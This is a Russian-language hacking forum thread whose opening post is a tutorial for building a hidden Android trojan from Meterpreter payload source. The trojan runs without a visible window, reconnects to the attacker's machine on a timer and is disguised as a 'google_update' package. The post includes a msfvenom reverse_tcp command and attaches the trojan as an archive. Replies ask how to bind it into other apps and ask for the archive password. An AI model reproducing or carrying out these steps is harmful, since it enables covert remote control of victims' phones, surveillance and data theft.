1. Внимание!!! Не заходит на форум? Хотите сохранить доступность к нам на 99.9%? Обязательно запишите все зеркала проекта! Именно по этому мы настоятельно рекомендуем использовать онион домен для TOR-Браузера, там доступность форума будет максимальной. Ссылка для установки и все зеркала в этой темe.

    Зеркало для TOR-Браузера - http://norabizt5qqxefxy.onion

    Чистое зеркало для обычных браузеров - https://nora.holiday

    Скрыть объявление

Собираем скрытый троян на Android

Тема в разделе "ВИРУСОЛОГИЯ", создана пользователем scrack, 21 янв 2018.

  1. scrack
    off

    scrack Бываю в Норе УЧАСТНИКИ

    Сообщения:
    27
    Адрес:
    Unknow
    Репутация:
    3
    Сфера:
    Вирусология
    Сегодня будем учиться делать скрытый троян|бекдор на андроид средствами разработки на AndroidStudio и используя исходник от Android Meterpreter Payload с дальнейшим закреплением в системе.

    нам понадобится:

    Android Studio и Android SDK

    Android Meterpreter Payload source code

    Первый этап (Подготовительный):

    Качаем SourceCode(исходник) метерпретора под андроид,ставим андроид студию и SDK

    (При установке SDK вы можете скачать пакеты AVD(Аndroid Virtual Device|Аднроид эмуляторов) для тестирования приложения на эмулированом устройстве,но как по мне то эти эмуляторы очень таки медленные и лучше тестировать на своем реальном девайсе или же использовать другой эмулятор (например genymotion или образы андроида для виртуалок) Ссылки на то как настроить студию с генимоушн или физическим девайсом я кину в конце статьи и в описания видео.

    Ну я уже все скачал.Показывать процесс установки не буду.

    Запускаем студию,создаем проект,даем ему имя. Выбираем минимальную версию API андроида,я выбрал IceCreamSandwich 4.0 так как
    [​IMG]
    [​IMG]
    это самая распространенная версия Android по статистике разработчиков.

    Выбираем приложения без активити (activity) -- это означает что при запуске не будет никаких

    визуальных окон (activity) и приложения просто запуститься себе и будет висеть в фоне.

    [​IMG]
    На этом подготовительный этап завершен

    Подключить genymotion к Android Studio

    Подключить реальный смартфон к Android Studio



    Второй этап (Базовые настройки пейлоада)

    Открываем наш проект в студии.

    [​IMG]
    Далее распаковываем скаченный архив с гитхаба с исходниками метерпретера. Находим там папку \backdooredapk\ где лежат наши java файлы и перетаскиваем их в наш проект в андроид студии.

    [​IMG]
    Далее первым шагом же изменим в файле payload.java ip адрес нашего листенера(нашей атакующеймашины,где у нас запущен метаслоит)

    [​IMG]
    Затем нам будет интересен файлMyIntentService.java,в котором мы сможем опционально задать интервал времени через которое наш бекдор будет конектиться к машине атакуищего.

    (long half_an_hour = (3600)/(2); //время в секундах между каждой попыткой открыть новую meterpreter сессию " Я для демонстрации поставлю минуту" )

    [​IMG]
    Далее нам понадобитсяAndroidManifest.xml из архива. Возьмем от туда пользовательские разрешение (user.permisions) и все что между тегами<application></application>

    После того как мы копипасним пермишенс и апликейшн нам нужно будет опционально изменить(указать) имя активити(<activiyt>android:name) и имя службы(<Service>android:name)

    [​IMG]
    [​IMG]
    Хотя студия сама нам это покажет что не нашла пути которое по дефолту был в тегах активити и сервиса(выделит их красным цветом).

    Нужно заменить их (stage.metasploit.com на com.darknode.google_update в моем случае "путь(имя) к вашему проекту")

    [​IMG]
    [​IMG]
    Но в манифесте (AndroidManifest.xml) из архива есть один небольшой косяк.После копипаста его в наш проект нужно добавить права(permisions),так как там не полный нужный нам список прав.

    Для этого возьмем и реверснем апк созданный с помощью msfvenon:

    msfvenom -p android/meterpreter/reverse_tcp lhost=айпи lport=порт r > ./meter.apk(хотя айпи и порт можно рандомный,нам нужен только манифест от туда)

    [​IMG]
    [​IMG]
    Скопируем разрешение с манифеста в наш проект

    [​IMG]
    [​IMG]
    Далее осталось подписать наше приложения.

    [​IMG]
    [​IMG]
    Подписали) Ну что ж давайте протестим.))

    [​IMG]
    [​IMG]

    [​IMG]
    [​IMG]
    [​IMG]
    На этом наш этап пока закончим.
     

    Вложения:

    • troyan.zip
      Размер файла:
      1,2 МБ
      Просмотров:
      208
  2. AppleBro
    off

    AppleBro Бываю в Норе УЧАСТНИКИ

    Сообщения:
    31
    Пол:
    Мужской
    Адрес:
    AppStore
    Репутация:
    2
    Сфера:
    Анонимность
    Кто знает как склеивать с другими приложениями?
     
  3. caxmd
    off

    caxmd Бываю в Норе УЧАСТНИКИ

    Сообщения:
    25
    Пол:
    Мужской
    Адрес:
    str.stefan cel mare
    Репутация:
    1
    Сфера:
    Студент
    bolemeni narmalna
     
  4. kalyanbot
    off

    kalyanbot Пока одупляюсь БЕЗ ПРОБЕГА

    Сообщения:
    3
    Пол:
    Мужской
    Адрес:
    украина, чернигов
    Репутация:
    0
    Сфера:
    Хакинг
    Какой пасс?